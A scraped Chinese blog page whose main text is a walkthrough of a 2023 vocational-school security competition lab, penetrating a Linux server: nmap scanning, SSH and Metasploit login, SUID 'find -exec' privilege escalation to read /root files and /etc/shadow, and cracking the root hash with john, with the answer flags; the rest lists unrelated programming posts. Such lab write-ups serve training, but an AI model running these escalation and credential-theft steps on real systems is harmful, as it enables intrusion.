当前位置：首页 > news >正文

2023年中职“网络安全“—Linux系统渗透提权②

news 2026/5/9 7:05:09

2023年中职"网络安全"—Linux系统渗透提权②

Linux操作系统渗透测试
- 任务环境说明：
- - 1. 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；
  - 2. 使用渗透机对服务器信息收集，并将服务器中主机名称作为flag提交；
  - 3. 使用渗透机对服务器信息收集，并将服务器中系统内核版本作为flag提交；
  - 4. 使用渗透机对服务器管理员提权，并将服务器中root目录下的文本内容作为flag提交；
  - 5. 使用渗透机对服务器管理员提权，并将服务器中root的密码作为flag提交；

Linux操作系统渗透测试

任务环境说明：

服务器场景：Server2203（关闭链接）
用户名：hacker 密码：123456

1. 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；

nmap -p- -sV 靶机IP        # -p- 全端口，-sV 版本探测

flag: 2232/tcp

2. 使用渗透机对服务器信息收集，并将服务器中主机名称作为flag提交；

ssh hacker@靶机IP -p 2232            # -p 指定端口，这里有点小坑，应该kali的ssh版本高，靶机的ssh版本低，导致的。

# 解法 1
ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算，你可以点击下面的链接

legacy.html

# 解法 2 
msfconsole                    # 我只说你可能不懂得
search ssh_login
use 0
set RHOSTS 靶机IP
set username hacker
set password 123456
set RPORT 2232                # 注意一定要改端口，别忘记了
run
sessions -l                   # 列出会话
sessions 1                    # 连接第一个会话

uname -a        # 查看系统基本信息

flag: 1doLfH31

3. 使用渗透机对服务器信息收集，并将服务器中系统内核版本作为flag提交；

uname -a        # 查看系统基本信息

flag: 2.6.18-8.el5

4. 使用渗透机对服务器管理员提权，并将服务器中root目录下的文本内容作为flag提交；

find / -perm -u=s -type f 2>/dev/null

touch 1                            # 创建个文件
ls                                 # ls 查看文件
/usr/bin/find 1 -exec id \;        # 提权 -exec 执行命令 \; 结束

/usr/bin/find 1 -exec ls /root \;
/usr/bin/find 1 -exec cat /root/key.txt \;

flag: 84pPxbiP

5. 使用渗透机对服务器管理员提权，并将服务器中root的密码作为flag提交；

/usr/bin/find 1 -exec cat /etc/shadow \;

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码

flag: darkman

使用渗透机对服务器管理员提权，并将服务器中root目录下的图片内容作为flag提交。

su root                            # 切换root用户
id                                 # 查看id是否为root
cd                                 # 不加参数会直接回到当前用户的家目录
pwd                                # 查看当前所在目录路径
python -V                          # 查看当前python版本
python -m SimpleHTTPServer 8080    # 开启HTTP服务，端口8080

访问的时候一定要指定8080端口

flag: HVcKG7tf

2023年中职“网络安全“—Linux系统渗透提权②

2023年中职"网络安全"—Linux系统渗透提权② Linux操作系统渗透测试任务环境说明：1. 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；2. 使用渗透机对服务器信息收集，并将服务器中主机名称作为flag…...

编程日记 2023/11/22 1:44:12

多模态大模型训练数据集汇总介绍

RefCOCO、RefCOCO、RefCOCOg 这三个是从MS-COCO中选取图像得到的数据集，数据集中对所有的 phrase 都有 bbox 的标注。 RefCOCO 共有19,994幅图像，包含142,209个引用表达式，包含50,000个对象实例。RefCOCO 共有19,992幅图像，包含1…...

编程日记 2023/11/22 1:43:11

IDEA中更换java项目JDK

我们打开IDEA 打开项目然后选择 File 下的 Project Structure 这里我们下拉选择自己需要的JDK Sources这里也要设置一下JDK对应版本然后上面这个 Project 中也要设置一下对应jdk的版本保持一直然后我们打开 File 下的 Settings 然后找到如下图配置如果JKD版本看…...

编程日记 2023/11/22 1:42:10

C++函数

转载知呼大佬06 - C函数 - 知乎 (zhihu.com) 06 - C函数本期我们讨论的是 C 中的函数。函数到底是什么呢，函数就是我们写的代码块，被设计用来执行特定的任务，以后我们学习 class 类的时候，这些块会被称为方法，但是…...

编程日记 2023/11/22 1:41:09

设计模式-命令模式-笔记

“行为变化”模式在组件的构建过程中，组件行为的变化经常导致组件本身剧烈的变化。“行为变化”模式组件的行为和组件本身进行解耦，从而支持组件行为的变化，实现两者之间的松耦合。经典模式：Command、Visitor 动机&#xff0…...

编程日记 2023/11/22 1:40:08

酒店品牌纷纷冲击中高端，东呈集团能否“快人一步”？

过去两年酒店行业加速洗牌，“强者恒强”的马太效应正持续凸显。报告显示，2022年排名前10名的酒店集团分别为锦江国际、华住、首旅如家、格林、东呈集团、尚美数智、亚朵、德胧、逸柏、都市酒店。以上10家酒店集团客房规模在连锁酒店市场占有率为62.36&…...

编程日记 2023/11/22 1:39:07

[hive] posexplode函数

在Hive SQL中，posexplode是一个用于将数组（array）拆分为多行的函数。它返回数组中的每个元素以及其在数组中的位置（索引）作为两列输出。这是posexplode函数的语法： posexplode(array)其中，…...

编程日记 2023/11/22 1:38:06

C#具名参数（Named Parameters）

在 C# 中，具名参数（Named Parameters）是一种在方法调用中使用参数名称来指定参数值的技术。通常情况下，我们使用位置参数（Positional Parameters）来按照方法参数的顺序传递参数值。但是，使用具名…...

编程日记 2023/11/22 1:37:03

Vue3的组件如何通讯

一、defineProps，defineEmits 子组件nameChange.vue <template><div class"title">姓：{{ firstName }}</div><div>名：{{ lastName }}</div>{{ name }}<button click"clickTap">传…...

编程日记 2023/11/22 1:36:01

MySQL SUBSTRING_INDEX 函数用法

定义和用法 SUBSTRING_INDEX()函数在指定数量的分隔符出现之前返回字符串的子字符串。语法 SUBSTRING_INDEX(string, delimiter, number) 参数值参数描述 string 必须项。原始字符串 delimiter 必须项。要搜索的分隔符 number 必须项。搜索分隔符的次数。可以是正…...

编程日记 2023/11/22 1:35:00

腾讯微服务平台TSF学习笔记（一）--如何使用TSF的Sidecar过滤器实现mesh应用的故障注入

Mesh应用的故障注入故障注入前世今生Envoy设置故障注入-延迟类型设置故障注入-延迟类型并带有自定义状态码总结故障注入前世今生故障注入是一种系统测试方法，通过引入故障来找到系统的bug，验证系统的稳健性。istio支持延迟故障注入和异常故障注入。 …...

编程日记 2023/11/22 1:33:59

day30_servlet

今日内容零、复习昨日一、接收请求二、处理响应三、综合案例零、复习昨日画图, 请求处理的完整流程(javaweb开发流程) 零、注解改造 WebServlet注解,相当于是在web.xml中配置的servlet映射 Servlet类 package com.qf.servlet;import javax.servlet.ServletException; im…...

编程日记 2023/11/22 1:32:57

计算机毕业设计基于SpringBoot的社区物资交易互助平台/系统的设计与实现 Java实战项目附源码+文档+视频讲解

博主介绍：✌从事软件开发10年之余，专注于Java技术领域、Python人工智能及数据挖掘、小程序项目开发和Android项目开发等。CSDN、掘金、华为云、InfoQ、阿里云等平台优质作者✌ 🍅文末获取源码联系🍅 👇🏻 精…...

编程日记 2023/11/22 1:31:56

go 判断两棵树内容是否一致

goroutine http://127.0.0.1:3999/concurrency/8 question 使用 go 判断两个树存放的序列是否相同, 如果相同他们被称为 equivalent_tree tree struct type Tree struct {Left *TreeValue intRight *Tree }由于递归的写法比较简单, 此处使用循环的形式来实…...

编程日记 2023/11/22 1:30:55

从Hugging Face上手动下载并加载预训练模型

0. 说明： 从 Hugging Face 上下手动载预训练的蛋白质语言模型（以ProstT5为例），用模型中的 encoder 部分对蛋白质进行编码，得到 embedding features，用于下游的任务。【ps. 除了手动下载之外，…...

编程日记 2023/11/22 1:29:54

import Vue from vue import VueRouter from vue-router //导入路由器 Vue.use(VueRouter)import Login from ../components/Login import User from ../components/User //导入需要路由的组件const router new VueRouter({//暴露出去使用routes:[{path: /login,component: Lo…...

编程日记 2023/11/22 1:28:53

upload-labs关卡11(双写后缀名绕过)通关思路

文章目录前言一、回顾前几关知识点二、靶场第十一关通关思路1、看源代码2、bp抓包双写后缀名绕过3、检查文件是否成功上传总结前言此文章只用于学习和反思巩固文件上传漏洞知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不能随意去尚未授权的…...

编程日记 2023/11/22 1:26:50

go语言学习之旅之Go语言基础语法二

学无止境，今天继续学习go语言的基础语法变量（Variables）: 变量声明： var x int变量初始化： var x int 10或者可以使用类型推断： x : 10多变量声明： var a, b, c int同时初始化多个变量&#…...

编程日记 2023/11/22 1:25:48

七天.NET 8操作SQLite入门到实战 - SQLite 简介

什么是SQLite？ SQLite是一个轻量级的嵌入式关系型数据库，它以一个小型的C语言库的形式存在。它的设计目标是嵌入式的，而且已经在很多嵌入式产品中使用了它，它占用资源非常的低，在嵌入式设备中，可能只需要几…...

编程日记 2023/11/22 1:24:47

问题 R: 胜利大逃亡（HUST）

#include <deque> #define inf 200000 #include<iostream> #include<queue> using namespace std;// 迷宫坐标 int map[59][59][59] { 0 };// 可访问标记 int visit[51][51][51] { 0 }; // 移动方式 int next1[7][4] { {1,0,0},{-1,0,0}, {0,1,0},{0,-1,…...

编程日记 2023/11/22 1:22:46